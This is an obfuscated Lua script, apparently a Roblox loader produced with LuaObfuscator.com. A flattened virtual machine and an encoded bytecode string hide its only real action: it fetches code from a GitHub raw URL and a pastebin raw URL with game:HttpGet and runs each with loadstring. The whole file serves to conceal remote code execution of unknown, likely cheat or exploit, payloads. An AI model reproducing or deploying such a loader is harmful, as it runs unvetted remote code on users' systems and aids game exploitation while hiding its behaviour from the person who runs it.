--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (5==v27) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==2) then v31=function()local v48=v2(v17,v28,v28);v28=v28 + 1 ;return v48;end;v32=nil;v32=function()local v49,v50=v2(v17,v28,v28 + (2 -0) );v28=v28 + 2 ;return (v50 * (1076 -(480 + 340))) + v49 ;end;v27=3;end if (v27==7) then v39=function(v40,v41,v42)local v51=0;local v52;local v53;local v54;while true do if (v51==0) then v52=v40[1];v53=v40[2];v51=1;end if (v51==1) then v54=v40[3];return function(...)local v88=1;local v89= -1;local v90={...};local v91=v13("#",...) -1 ;local function v92()local v94=v52;local v95=v53;local v96=v54;local v97=v37;local v98={};local v99={};local v100={};for v104=0,v91 do if ((v104>=v96) or ((1011 + 1224)>=(5777 -(465 + 1515)))) then v98[v104-v96 ]=v90[v104 + (1036 -(602 + 433)) ];else v100[v104]=v90[v104 + (2 -1) ];end end local v101=(v91-v96) + 1 ;local v102;local v103;while true do local v105=0 -(0 -0) ;local v106;while true do if ((v105==(0 + 0 + 0)) or (((4244 -3367) -(58 + 424))>=(1439 -((2046 -(253 + 1733)) + 22)))) then v106=1598 -(706 + 892) ;while true do if (((5462 -(1021 + 317))<=(538 + 3976)) and (v106==(848 -(167 + 681)))) then local v117=57 -(33 + 24) ;while true do if ((v117==0) or ((3898 + 433)<(358 -231))) then local v120=1303 -(156 + 1147) ;while true do if ((((1346 + 4072) -3380)>(243 + 202)) and ((1 + 0)==v120)) then v117=1 + 0 ;break;end if ((v120==(0 + 0)) or (2901<=317)) then v102=v94[v88];v103=v102[1871 -(1680 + 190) ];v120=3 -2 ;end end end if (((854 + 473)<=3463) and ((242 -(33 + 208))==v117)) then v106=1 + 0 ;break;end end end if ((v106==(1 + 0)) or ((4018 + 183)<=(679 + 711))) then if ((1247<=(851 + 3003)) and (v103<=(1773 -(113 + 1658)))) then if ((v103<=(0 -0)) or ((6900 -3777)<=(2304 -(73 + 17)))) then local v123=1655 -(924 + 731) ;local v124;local v125;local v126;local v127;while true do if (((0 -0)==v123) or (1787<=(1294 -(303 + 26)))) then local v143=570 -((1034 -(294 + 517)) + 347) ;while true do if ((v143==(0 -0)) or (((906 -450) -(40 + 215))>=((2706 + 8402) -6188))) then v124=v102[(1024 -(807 + 212)) -3 ];v125,v126=v97(v100[v124](v14(v100,v124 + (937 -(365 + 571)) ,v102[3])));v143=1;end if (((429 + 64 + 2587)==(3190 -(98 + 12))) and (((10 -7) -2)==v143)) then v123=1;break;end end end if ((v123==(1 + 0)) or ((15257 -(2035 + 8304))<=((10301 -7587) + 1766))) then v89=(v126 + v124) -1 ;v127=13 -(9 + 4) ;v123=4 -2 ;end if ((v123==2) or ((468 + 23)>((1044 + 520) -(52 + 181)))) then for v148=v124,v89 do local v149=0 -0 ;local v150;while true do if ((4591>=(3728 -(376 + 18))) and (v149==((507 + 847) -(1303 + 51)))) then v150=0 + (1914 -(234 + 1680)) ;while true do if (((72 + 55)<=(2057 -(351 + 668))) and (v150==((1052 -(511 + 504)) -(11 + 26)))) then v127=v127 + 1 + 0 ;v100[v148]=v125[v127];break;end end break;end end end break;end end elseif ((v103>1) or ((3984 -(388 + 385))<3160)) then v100[v102[485 -(11 + 472) ]]();else local v131=0 + 0 ;local v132;local v133;local v134;while true do if (((4624 -(179 + 723))==(4363 -(472 + 169))) and (v131==(3 -2))) then v134=nil;while true do if ((((14475 -9218) -(1877 -(285 + 365)))==4030) and ((92 -(80 + 12))==v132)) then local v164=0;local v165;while true do if ((v164==((1676 -(612 + 342)) -(88 + 634))) or ((1460 -577)>=((1379 -816) + 2121))) then v165=0;while true do if (((1204 -944)==((1117 -(61 + 854)) + 58)) and (v165==(0 + 0))) then v133=v102[2 + 0 ];v134=v100[v102[5 -2 ]];v165=1462 -(1246 + 215) ;end if ((v165==(1 + 0)) or ((4818 -(4185 -2148))==(2715 -964))) then v132=2 -1 ;break;end end break;end end end if (((1 -0)==v132) or ((205 -(26 + 24))>=1968)) then v100[v133 + (1 -0) ]=v134;v100[v133]=v134[v102[13 -9 ]];break;end end break;end if ((v131==(0 -(0 + 0))) or ((483 + 147 + 191)>=(2760 -(64 + 871)))) then local v151=0 -0 ;while true do if ((1==v151) or ((795 + 303)>=2755)) then v131=(4 -2) -1 ;break;end if (((2449 -1611)==838) and (v151==((0 + 0) -0))) then v132=1305 -(505 + 800) ;v133=nil;v151=1 + 0 ;end end end end end elseif ((v103<=(1903 -(1729 + 170))) or ((4310 -(1484 + 1286))<=(1049 + 167))) then if (((4409 -3473)>=(701 + (2047 -(373 + 1594)))) and (v103>(5 -2))) then local v135=0 + 0 ;local v136;local v137;while true do if ((0==v135) or ((844 -360)==(754 + (9017 -5191)))) then local v152=1772 -(1758 + 14) ;while true do if ((858<(4321 -3117)) and (v152==(1 + 0))) then v135=1;break;end if ((v152==(0 -0)) or ((2164 + 1294)==(1170 -(74 + 937)))) then v136=0 + 0 ;v137=nil;v152=1 + 0 ;end end end if ((v135==(1 + 0)) or ((422 + 4289)<(344 + (3039 -(1021 + 650))))) then while true do if ((v136==(0 -0)) or ((644 + 1195)>=(2503 -(92 + 180)))) then v137=v102[2 + 0 ];v100[v137]=v100[v137](v14(v100,v137 + 1 ,v89));break;end end break;end end else v100[v102[2]]=v42[v102[3 + (956 -(156 + 800)) ]];end elseif ((v103>(9 -4)) or ((1344 -(37 + 38))==(1188 + 46))) then do return;end else v100[v102[2]]=v102[8 -5 ];end v88=v88 + (2 -1) ;break;end end break;end end end end A,B=v37(v12(v92));if  not A[1] then local v107=0;local v108;while true do if (v107==0) then v108=v40[4][v88] or "?" ;error("Script error at ["   .. v108   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end end end;return v39(v38(),{},v18)(...);end if (v27==0) then v28=1;v29=nil;v17=v5(v4(v17,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v79=v3(v1(v43,16));if v29 then local v93=v6(v79,v29);v29=nil;return v93;else return v79;end end end);v27=1;end if (v27==6) then v38=nil;v38=function()local v55=1175 -(586 + 589) ;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v55~=3) then else v62=nil;v63=nil;v55=4 + 0 ;end if (v55~=(1999 -(702 + 1296))) then else v58=nil;v59=nil;v55=2 + 0 ;end if (v55~=(413 -(143 + 270))) then else v56=0 -0 ;v57=nil;v55=1;end if (v55~=(14 -10)) then else while true do if (v56==(2 -1)) then v59=nil;v60=nil;v56=1 + 1 ;end if (v56==2) then local v109=0 -0 ;while true do if (v109==(240 -(125 + 114))) then v56=3;break;end if ((0 + 0)~=v109) then else v61=nil;v62=nil;v109=1;end end end if (v56~=(992 -(487 + 505))) then else local v110=0 -0 ;while true do if (v110==(1 + 0)) then v56=1 -0 ;break;end if (v110==0) then v57=0;v58=nil;v110=1;end end end if (v56==(173 -(72 + 98))) then v63=nil;while true do local v111=1286 -(636 + 650) ;while true do if (v111~=(0 -0)) then else local v116=0;while true do if (v116==(0 -0)) then if (v57~=(0 -0)) then else local v121=0 -0 ;while true do if (v121~=(0 -0)) then else v58={};v59={};v121=1;end if ((1 + 1)==v121) then v57=3 -2 ;break;end if (v121~=(1662 -(476 + 1185))) then else v60={};v61={v58,v59,nil,v60};v121=9 -7 ;end end end if (v57~=(1188 -(1146 + 41))) then else local v122=0 + 0 ;while true do if (v122==1) then for v144=1985 -(602 + 1382) ,v62 do local v145=1466 -(1369 + 97) ;local v146;local v147;while true do if ((1 + 0)~=v145) then else if (v146==(3 -2)) then v147=v31()~=0 ;elseif (v146==(1711 -(1638 + 71))) then v147=v34();elseif (v146==3) then v147=v35();end v63[v144]=v147;break;end if ((0 + 0)==v145) then local v155=1112 -(428 + 684) ;while true do if (v155==1) then v145=886 -(386 + 499) ;break;end if (v155==(0 -0)) then v146=v31();v147=nil;v155=1;end end end end end v61[9 -6 ]=v31();v122=1 + 1 ;end if (v122==(0 + 0)) then v62=v33();v63={};v122=316 -(188 + 127) ;end if ((2 -0)~=v122) then else v57=1 + 1 ;break;end end end v116=12 -(8 + 3) ;end if (v116==1) then v111=4 -3 ;break;end end end if ((3 -2)==v111) then if (v57~=2) then else local v118=0 -0 ;local v119;while true do if (v118==0) then v119=326 -(175 + 151) ;while true do local v128=0 -0 ;while true do if (v128~=(769 -(305 + 464))) then else if ((162 -(128 + 33))==v119) then for v156=2 -1 ,v33() do v60[v156]=v33();end return v61;end if (v119~=(0 + 0)) then else for v158=1 + 0 ,v33() do local v159=1239 -(585 + 654) ;local v160;local v161;while true do if ((0 -0)~=v159) then else v160=0;v161=nil;v159=1;end if (v159==(3 -2)) then while true do if ((0 -0)==v160) then v161=v31();if (v30(v161,3 -2 ,1 + 0 )~=(602 -(426 + 176))) then else local v175=0 -0 ;local v176;local v177;local v178;local v179;local v180;local v181;while true do if (v175~=(4 -1)) then else while true do if ((1 -0)==v176) then local v182=0;while true do if (v182==(140 -(99 + 41))) then v179=nil;v180=nil;v182=1204 -(568 + 635) ;end if (v182~=(1 -0)) then else v176=975 -(722 + 251) ;break;end end end if (v176~=(2 + 0)) then else v181=nil;while true do if (v177==(2 + 0)) then while true do if ((0 -0)==v178) then local v184=0 -0 ;local v185;local v186;while true do if (v184~=(0 + 0)) then else v185=0 -0 ;v186=nil;v184=2 -1 ;end if (v184==1) then while true do if (v185~=(1959 -(982 + 977))) then else v186=0 + 0 ;while true do if (v186==1) then v178=1;break;end if (0==v186) then local v196=620 -(207 + 413) ;while true do if (v196==(1 -0)) then v186=1;break;end if (v196==(0 -0)) then v179=v30(v161,2,1 + 2 );v180=v30(v161,11 -7 ,1471 -(1294 + 171) );v196=1313 -(734 + 578) ;end end end end break;end end break;end end end if (v178==3) then if (v30(v180,1777 -(791 + 983) ,3)~=(321 -(30 + 290))) then else v181[9 -5 ]=v63[v181[17 -13 ]];end v58[v158]=v181;break;end if (v178==(3 -1)) then local v188=0;local v189;while true do if (0==v188) then v189=0 + 0 ;while true do if (v189==(0 + 0)) then local v195=1928 -(1393 + 535) ;while true do if (v195~=(1 + 0)) then else v189=523 -(292 + 230) ;break;end if (v195~=(0 + 0)) then else if (v30(v180,967 -(73 + 893) ,3 -2 )~=1) then else v181[1936 -(710 + 1224) ]=v63[v181[386 -(110 + 274) ]];end if (v30(v180,2 + 0 ,2)==(1 + 0)) then v181[2 + 1 ]=v63[v181[3]];end v195=1;end end end if (v189==(1093 -(221 + 871))) then v178=394 -(200 + 191) ;break;end end break;end end end if (v178==(1 -0)) then local v190=0;local v191;local v192;while true do if (v190==(1 + 0)) then while true do if (v191==(939 -(661 + 278))) then v192=1207 -(568 + 639) ;while true do if (v192==(1 + 0)) then v178=1677 -(440 + 1235) ;break;end if (v192==(0 + 0)) then local v197=333 -(85 + 248) ;local v198;while true do if (v197==0) then v198=0 + 0 ;while true do if (v198==(1474 -(1269 + 204))) then v192=2 -1 ;break;end if (v198==(0 -0)) then v181={v32(),v32(),nil,nil};if (v179==(0 -0)) then local v203=0 -0 ;local v204;local v205;while true do if (v203~=1) then else while true do if (v204==(0 -0)) then v205=0 + 0 ;while true do if (v205==(1603 -(827 + 776))) then v181[3]=v32();v181[4]=v32();break;end end break;end end break;end if (v203~=(1174 -(216 + 958))) then else v204=0 -0 ;v205=nil;v203=1945 -(988 + 956) ;end end elseif (v179==(398 -(172 + 225))) then v181[3 + 0 ]=v33();elseif (v179==(2 + 0)) then v181[9 -6 ]=v33() -((3 -1)^(10 + 6)) ;elseif (v179~=(1886 -(1211 + 672))) then else local v208=1413 -(356 + 1057) ;local v209;local v210;while true do if ((254 -(111 + 142))==v208) then while true do if ((0 + 0)==v209) then v210=0 -0 ;while true do if (v210==(0 -0)) then v181[282 -(155 + 124) ]=v33() -((369 -(129 + 238))^(1259 -(1144 + 99))) ;v181[1 + 3 ]=v32();break;end end break;end end break;end if (v208==(0 -0)) then v209=588 -(183 + 405) ;v210=nil;v208=1469 -(1213 + 255) ;end end end v198=1769 -(298 + 1470) ;end end break;end end end end break;end end break;end if (v190==(0 + 0)) then v191=0;v192=nil;v190=1;end end end end break;end if (v177==0) then v178=0 -0 ;v179=nil;v177=2 -1 ;end if (v177==(1 + 0)) then v180=nil;v181=nil;v177=7 -5 ;end end break;end if (v176~=(0 -0)) then else local v183=0 -0 ;while true do if ((3 -2)==v183) then v176=1 -0 ;break;end if (0~=v183) then else v177=1022 -(874 + 148) ;v178=nil;v183=174 -(136 + 37) ;end end end end break;end if ((1 + 0)~=v175) then else v178=nil;v179=nil;v175=7 -5 ;end if (v175~=2) then else v180=nil;v181=nil;v175=3;end if (v175==(0 + 0)) then v176=1277 -(326 + 951) ;v177=nil;v175=1;end end end break;end end break;end end end for v162=1,v33() do v59[v162-1 ]=v38();end v119=1 + 0 ;end break;end end end break;end end end break;end end end break;end end break;end if (v55==(888 -(345 + 541))) then v60=nil;v61=nil;v55=4 -1 ;end end end;v39=nil;v27=7;end if (v27==1) then v30=nil;v30=function(v44,v45,v46)if v46 then local v80=0 -0 ;local v81;while true do if (v80==((81 + 1895) -(161 + 1527 + 288))) then v81=(v44/((6 -4)^(v45-1)))%((2 + 0)^(((v46-1) -(v45-(1 + 0))) + (2 -1))) ;return v81-(v81%(1 + 0)) ;end end else local v82=(1013 + 488) -(321 + 1180) ;local v83;while true do if (v82==(1957 -(1865 + 92))) then v83=2^(v45-(1 + 0)) ;return (((v44%(v83 + v83))>=v83) and (2 -1)) or (0 -(0 + 0)) ;end end end end;v31=nil;v27=2;end if (3==v27) then v33=nil;v33=function()local v64=302 -(138 + 164) ;local v65;local v66;local v67;local v68;while true do if (v64==0) then v65,v66,v67,v68=v2(v17,v28,v28 + (12 -9) );v28=v28 + (5 -1) ;v64=3 -2 ;end if (v64==(1 + 0)) then return (v68 * (6228114 + 10549102)) + (v67 * (19518 + 12147 + 33871)) + (v66 * (96 + 160)) + v65 ;end end end;v34=nil;v27=4;end if (v27==4) then v34=function()local v69=v33();local v70=v33();local v71=2 -1 ;local v72=(v30(v70,830 -(721 + 108) ,756 -(432 + 304) ) * (((3 -1) + 0)^(103 -71))) + v69 ;local v73=v30(v70,4 + 17 ,4 + 27 );local v74=((v30(v70,32)==(950 -(551 + 398))) and  -(159 -((163 -64) + (173 -114)))) or (1727 -(835 + 891)) ;if (v73==(0 + 0)) then if (v72==0) then return v74 * (0 + 0) ;else v73=1;v71=(162 -(27 + 135)) + 0 ;end elseif (v73==(4468 -2421)) then return ((v72==(0 + 0)) and (v74 * ((3 -2)/(0 -0)))) or (v74 * NaN) ;end return v9(v74,v73-(218 + 805) ) * (v71 + (v72/((8 -6)^(34 + 18)))) ;end;v35=nil;v35=function(v47)local v75;if  not v47 then local v84=0 + 0 ;while true do if (((250 -98) -(115 + 37))==v84) then v47=v33();if (v47==(0 + 0)) then return "";end break;end end end v75=v4(v17,v28,(v28 + v47) -(1 + 0) );v28=v28 + v47 ;local v76={};for v77=674 -(424 + 249) , #v75 do v76[v77]=v3(v2(v4(v75,v77,v77)));end return v7(v76);end;v27=5;end end end;v16("LOL!053O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C305349582F666E6C2F6D61696E2F6D61696E2532306775692532306F626603213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F5047593257626B76000F3O0012033O00013O001203000100023O002001000100010003001205000300046O000100034O00045O00022O00023O000100010012033O00013O001203000100023O002001000100010003001205000300056O000100034O00045O00022O00023O000100012O00063O00017O000F3O00023O00023O00023O00023O00023O00023O00023O00033O00033O00033O00033O00033O00033O00033O00043O00",v10(),...);break;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
